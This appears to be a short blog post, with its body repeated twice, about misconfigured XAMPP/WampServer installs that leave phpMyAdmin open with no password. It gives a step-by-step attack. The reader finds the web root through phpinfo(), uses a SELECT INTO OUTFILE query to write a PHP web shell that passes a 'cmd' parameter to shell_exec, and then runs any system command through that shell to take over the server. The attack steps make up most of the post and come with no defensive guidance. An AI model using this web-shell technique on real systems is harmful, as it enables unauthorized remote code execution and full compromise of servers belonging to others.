Hello Friends, today I'm going to discuss an interesting topic on XAMPP/WampServer. The above two applications are easily available on internet and easy-to-use too. You can visit the following web sites for more information.
# http://www.apachefriends.org/en/xampp-windows.html
# http://www.wampserver.com/en/
During internal penetration testing, we noticed most of system administrators (small or medium organization) do not configure the web server (XAMPP/WampServer) properly, they simply deploy the web server with default configuration, without giving php/mysql admin password.
Usually, with default configuration, any user can access the Admin console of that web server and using this admin-console an user can perform create / update / delete operations on mysql database server. From web admin console ( phpinfo() ), we can get server installation path.
I'll tell how phpMysqlAdmin console can destroy a system, the steps are given below,
step 1. Get the web server installation path ( phpinf.php or test.php or phpinfo() ), say 'c:\XAMPP\htdocs'.
step 2. Go to php-mysql admin section.
step 3. Go to Query/sql tab.
step 4. Write the following sql query into input text area and submit the query,
SELECT "< ? $c = $_GET['cmd']; $op = shell_exec($c); echo $op ? >" into OUTFILE "c:\XAMPP\htdocs\shell.php";
N.B: The above SQL command will create a shell.php file on the web server.
step 5. After executing the above command , the shell.php file will be accessible
directly, as it was created on web directory.
step 6. Access the shell.php file from your web browser,
http://x.x.x.x/shell.php?cmd=<your_command>
In your_command field you can use any system command you want to execute.By doing this
you will get full control on the web server and its called Owned-THE-BOX.
# http://www.apachefriends.org/en/xampp-windows.html
# http://www.wampserver.com/en/
During internal penetration testing, we noticed most of system administrators (small or medium organization) do not configure the web server (XAMPP/WampServer) properly, they simply deploy the web server with default configuration, without giving php/mysql admin password.
Usually, with default configuration, any user can access the Admin console of that web server and using this admin-console an user can perform create / update / delete operations on mysql database server. From web admin console ( phpinfo() ), we can get server installation path.
I'll tell how phpMysqlAdmin console can destroy a system, the steps are given below,
step 1. Get the web server installation path ( phpinf.php or test.php or phpinfo() ), say 'c:\XAMPP\htdocs'.
step 2. Go to php-mysql admin section.
step 3. Go to Query/sql tab.
step 4. Write the following sql query into input text area and submit the query,
SELECT "< ? $c = $_GET['cmd']; $op = shell_exec($c); echo $op ? >" into OUTFILE "c:\XAMPP\htdocs\shell.php";
N.B: The above SQL command will create a shell.php file on the web server.
step 5. After executing the above command , the shell.php file will be accessible
directly, as it was created on web directory.
step 6. Access the shell.php file from your web browser,
http://x.x.x.x/shell.php?cmd=<your_command>
In your_command field you can use any system command you want to execute.By doing this
you will get full control on the web server and its called Owned-THE-BOX.
No comments:
Post a Comment